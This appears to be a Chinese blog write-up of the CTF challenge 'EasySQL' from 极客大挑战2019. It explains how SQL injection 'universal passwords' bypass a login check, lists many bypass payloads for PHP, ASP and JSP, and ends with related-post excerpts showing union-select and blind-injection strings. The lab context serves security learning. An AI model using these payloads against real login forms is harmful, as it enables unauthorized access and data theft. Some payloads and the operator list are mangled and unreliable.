【WEB】[极客大挑战2019]EasySQL WP

最新推荐文章于 2025-06-02 04:20:29 发布
最新推荐文章于 2025-06-02 04:20:29 发布
阅读量502 收藏
点赞数 1
CC 4.0 BY-SA版权
分类专栏: CTF WP 文章标签: unctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Miscedence__/article/details/115709191
本文通过极客大挑战2019的EasySQL题目,介绍了SQL注入中的万能密码原理。讲解了当网站后台未过滤单引号时,如何利用万能密码进行SQL注入,包括万能密码的逻辑运算符优先级和多种表现形式。同时列举了PHP、ASP/ASPX和JSP环境下的万能密码示例。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

0X0000000000000001 审题初始界面

其实由题目可以知道这是道SQL注入,然后看到登录,首先尝试万能密码:

admin’ or ‘1’='1(红色部分为切入点,其他随意)    这道题的username随便

Got it

如名字所说,这是一道很ez的SQL注入
通过这道题,我们来延伸一下其他东西

0X0000000000000002 关于万能密码

为什么在注入的时候输入万能密码就可以进入呢,对于所有万能密码,都是”万能“的吗?
那么首先,让我们清楚

SQL注入-万能密码的注入原理

  • 0_用户进行用户名和密码验证时,网站需要查询数据库,查询数据库就是执行SQL语句
//用户登陆时,后台执行的数据库查询操作
Select user_id,user_type,email From users Where user_id='用户名' And password='密码'
  • 1_网站后台在进行数据库查询的时候没有对单引号)进行过滤,当输入用户名和万能密码【2 'or '1】的时候:
Select user_id,user_type,email From users Where user_id='admin' And password='2' or '1'
  • 2_SQL语句中逻辑运算符具有优先级

利用万能的互联网,优先级从上往下,由
:=     对变量赋值
||, OR, XOR     管道符(将前面语句作为条件,执行符号后面的语句),或(条件满足其一即返回值),异或(str1与str2比较,相同为0,不同为1)
&&, AND
NOT    否定之后的所有条件
BETWEEN, CASE, WHEN, THEN, ELSE
=, <=>, >=, >, <=, <, <>, !=, IS, LIKE, REGEXP, IN
|
&
<, >>
-, +
*, /, DIV, %, MOD
^
- (一元减号), ~ (一元比特反转)
!
BINARY, COLLATE

由于这些优先级,SQL语句在后台解析的时候:

Select user_id,user_type,email From users Where user_id='admin' And password='2' 和'1'

两句bool进行逻辑or运算,恒为TRUE.

了解了原理过后,万能密码又有哪些呢

万能密码归纳

php:

‘or 1=1/*
"or “a”="a
“or 1=1–
“or”=”
“or”="a’=‘a
“or1=1–
“or=or”
'‘or’=‘or’
‘) or (‘a’=‘a
‘.).or.(’.a.’=’.a
'or 1=1
'or 1=1–
'or 1=1/*
'or”="a’=‘a
‘or’ ‘1’=‘1’
‘or’’=’
‘or’’=’‘or’’=’
‘or’=‘1’
‘or’=‘or’
'or.‘a.’='a
‘or1=1–
1’or’1’=‘1
a’or’ 1=1–
a’or’1=1–
or ‘a’=‘a’
or 1=1–
or1=1–

asp aspx:

"or “a”="a
‘.).or.(’.a.’=’.a
or 1=1–
‘or 1=1–
a’or’ 1=1–
"or 1=1–
‘or.‘a.’=‘a
“or”="a’=‘a
‘or’’=’
or’=‘or’

jsp :

1’or’1’=‘1
admin’ or 1=1/*

  • 补充:

网上还看到师傅用sqlmap一把梭,我不是很会用sqlmap
点击跳转——>

[极客挑战 2019]EasySQL1
lljiuhkhk的博客
07-20 2874
CTF,sql注入,web渗透,安全入门
BUUCTF Web[极客挑战2019] EasySQL
qq_36348811的博客
03-28 473
问题分析 题目类型是Web类型,而且是一个登录页面,首先考虑是否是SQL注入。 先尝试闭合方式,输入1,1’,1"判断,当输入为1’时报错,所以判断结果语句应该为单引号闭合。 根据报错信息,尝试注入,在此之前了一下万能用户名和万能密码。 补充知识 所谓的万能密码就是绕过登录验证直接进入管理员后台的密码,这种类型的密码可以通用到很多存在此漏洞的网站,所以称之为万能。 最常用的管理员用户名:admin root user test guest select * from table_na
[极客挑战 2019]EasySQL
m0_62709637的博客
05-28 229
重做buu,复习永远回获得你意想不到的知识; 点开后发现是一个登录界面;又因为有题目的提示所以直接寻找注入点(不过都使用登录了码,所以先使用弱口令测试一下) 看来不行 在用万能密码在试一下 发现获得flag 当然题目希望我们使用sql注入,所以我们用sql注入玩一下 (我们知道sql注入的思路是先寻找注入点,然后在一步一步的查询) (这里输入后会报错,因为太久没写懵了以下,后面想起来进行联合注入时需要让前面的输入错误,这样才方便执行之后我们的恶意语句,所以报错之后继
BUUCTF[极客挑战 2019]EasySQL 1题
最新发布
2301_79896143的博客
06-02 1259
SQL注入基础题 本文以"[极客挑战 2019]EasySQL"为例,析了SQL注入的基本原理和题过程。题目是一个采用GET请求的登录界面,通过输入测试发现存在SQL注入漏洞。文章详细分析了数字型和字符型注入的区别,指出该题属于字符型注入。题采用"万能密码"方法,通过构造1' or '1'='1等payload绕过验证。最终获得flag{c245efae-9088-4dec-8c2e-5c34c73392e9},展示了初级SQL注入的类型判断和payload构造技巧。
web-[极客挑战 2019]EasySQL
wojiushilsy的博客
04-16 540
题目要点题目内容题 题目要点 SQL注入—万能密码 题目内容 题 打开链接是一个登陆界面 最开始我认为用户名就是cl4y 只是在试密码 输入单引号'以后报错,应该是字符型注入 万能密码试一试 ????,成功 后面又试了试,用户名只要不是空,用万能密码都可以登录。 ...
极客挑战 2019EasySQL
热门推荐
Knsec
05-13 1万+
[极客挑战 2019] EasySQL 判断是数字还是字符型注入 正常查询的回显 输入字符型判断一下,发现报错了,看报错显示 ‘1’‘’,输入的是1’,这里查询语句中应该是存在一个单引号的,所以这里报错了,多了一个单引号,说明这里存在字符型的注入,先用万能钥匙测测 使用万能钥匙一测,第一次 正常回显错误,然后又用字符型的测了一下,发现这里的报错中带有 一部分的查询语句 # 万能公式 1 and 1=1 1' and '1'='1 1 or 1=1 1' or '1'='1
BUUCTF刷题记录[SUCTF 2019]EasySQL && [极客挑战 2019]LoveSQL
weixin_44120469的博客
12-04 232
BUUCTF刷题记录 [SUCTF 2019]EasySQL && [极客挑战 2019]LoveSQL [SUCTF 2019]EasySQL 这道题确实把我困住了 只有一个输入框,fuzz之后发现过滤了不少东西,显示Nonono 输入1之后显示 而且不管输入几都是这个界面 但是输入字母不是。 在这里我确实没有想到要去猜测后台查询字符的格式。 然而可以通过这里猜测到后台语句中有一个|| 1;show databases# 查询数据库信息 1;show table
[极客挑战 2019]LoveSQL
kuller_Yan的博客
05-19 427
[极客挑战 2019]LoveSQL-------wp from Kuller_yan 先打开靶场 看看题目 一看就和上一题 easysql 尝试万能钥匙1' or 1=1 # 看起来像md5密,但是密失败,继续查询字段,admin' order by 3 # admin' order by 4 # 到4的时候没有正常返回,然后用1' union select 1,2,3 # 回显点为2,3;然后用1' union select 1,database(), version() # 可以看到库名
BUUCTF【Web】LoveSQL
qq_70434663的博客
03-06 1102
我们要找的flag就在l0ve1ysq1表里面,为什么在第两张表里面,请张你的眼睛看题目。发现爆出了字段id username password,我们的flag就在password里面。接下来就是爆出字段里面的内容,步骤同上述相同。在这里注意一下,在CTF中SQL注入漏洞flag通常会放在当前使用的数据库中,这里已经有了数据库所以可以直接爆出数据库的表。既然万能用户名行不通,那么我们就使用万能密码,用户名使用admin。既然爆出了表,接下来就是爆出表里面的字段了,同样的使用payload。
BUUCTF-Web(持续更新中)
2301_80281749的博客
11-25 2603
查询字段1’ union select 1,2,group_concat(id,username,password) from l0ve1ysq1#,就得到了flag:flag{5366f7aa-8040-44fc-bd88-bd0cfc671f3d}cat /flag进行查看flag文件,于是得到flag:flag{d81837e0-b908-4a0a-bac0-23ff569befe1}1,于是就得到了flag:flag{fac64f95-3877-4f3e-9772-47bb8585b31a}
[极客挑战 2019]EasySQL——WP
旺仔Sec&blog
10-26 380
[极客挑战 2019]EasySQLWP
BUUCTF Web 极客挑战 2019 EasySQL
Brilliant_orange的博客
11-22 1795
(当然,我们只是猜测闭合符号是单引号,其他题目也可能是双引号)接下来,我们试试用一下万能账号或者密码两种方法(优先级:【and】>【=】>【or】,语句为真,可行,得到flag。(#后面内容注释掉了),也为真,得到flag。
极客挑战 2019]EasySQL 1
03-27
<think>好的,用户的问题是关于极客挑战2019EasySQL题目,需要相关的资料或决方案。首先,我需要回忆用户提供的引用内容。引用1提到sqli-labs和sqlmap的学习资料,以及buuctf上的真题练习,包括几个具体的题目,其中就有[极客挑战 2019]EasySQL。引用2则给出了一个具体的万能密码尝试的例子,如username=1'or 1=1%23&password=1。 用户的需求是寻找与这个题目相关的资料或决方案。根据引用1,我应该推荐sqli-labs和sqlmap的学习资源,以及buuctf上的真题。同时,引用2中的万能密码示例是题的关键点,需要详细说明。需要确保回答结构清晰,分步骤决问题,并且引用正确。 接下来,我需要检查是否有其他可能的决方案,比如联合查询、报错注入或时间盲注,但根据引用中的信息,题目可能设计为简单的万能密码绕过。因此,重点应放在万能密码和布尔盲注上。同时,要提醒用户注意题目环境的变化,可能需要调整payload,比如使用不同的注释符号或闭合方式。 最后,生成相关问题时要围绕SQL注入的基础知识、其他CTF题目推荐以及防御方法,这样用户可以获得更全面的信息。确保所有LaTeX格式正确,行内公式用$...$,独立公式用$$...$$,但在这个问题中可能用不上太多数学公式,但如果有涉及变量的地方需要注意格式。</think>### 关于[极客挑战 2019]EasySQL决方案 #### 1. 题目背景与目标 该题目属于CTF中Web类SQL注入题型,要求通过构造特定输入绕过登录验证。典型特征是用户登录框存在未过滤的SQL注入漏洞,需利用注入获取管理员权限或直接绕过认证。 #### 2. 核心题步骤 **步骤1:尝试万能密码注入** 输入经典万能密码构造闭合: ```sql username: 1' or 1=1# password: 任意值 ``` 对应的URL编码形式为: ``` check.php?username=1%27%20or%201=1%23&password=1 ``` *原理*:通过`'`闭合原语句的字符串,`or 1=1`使WHERE条件恒真,#注释掉后续语句[^2]。 **步骤2:处理可能的过滤** 若题目过滤空格或#,可尝试: ```sql username: 1'/**/or/**/1=1%23 password: 1 ``` 或使用括号闭合: ```sql username: 1')or(1=1)# ``` #### 3. 延伸注入方法 **布尔盲注(备选方案)** 若万能密码失效,可通过逐字符爆破获取信息: ```sql admin' and substr(database(),1,1)='a'# ``` 通过响应差异判断字符正确性。 #### 4. 推荐学习资源 - **sqli-labs实验平台**:系统学习注入类型(联合查询/报错注入/盲注)[^1] - **sqlmap源码分析**:学习自动化注入实现(如参数构造、指纹识别)[^1] - **BUUCTF平台同类题目**: - [[极客挑战 2019]LoveSQL](https://buuoj.cn/challenges) - [[SUCTF 2019]EasySQL](https://buuoj.cn/challenges) $$ \text{注入成功率} = \frac{\text{有效载荷数}}{\text{尝试次数}} \times 100\% $$
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值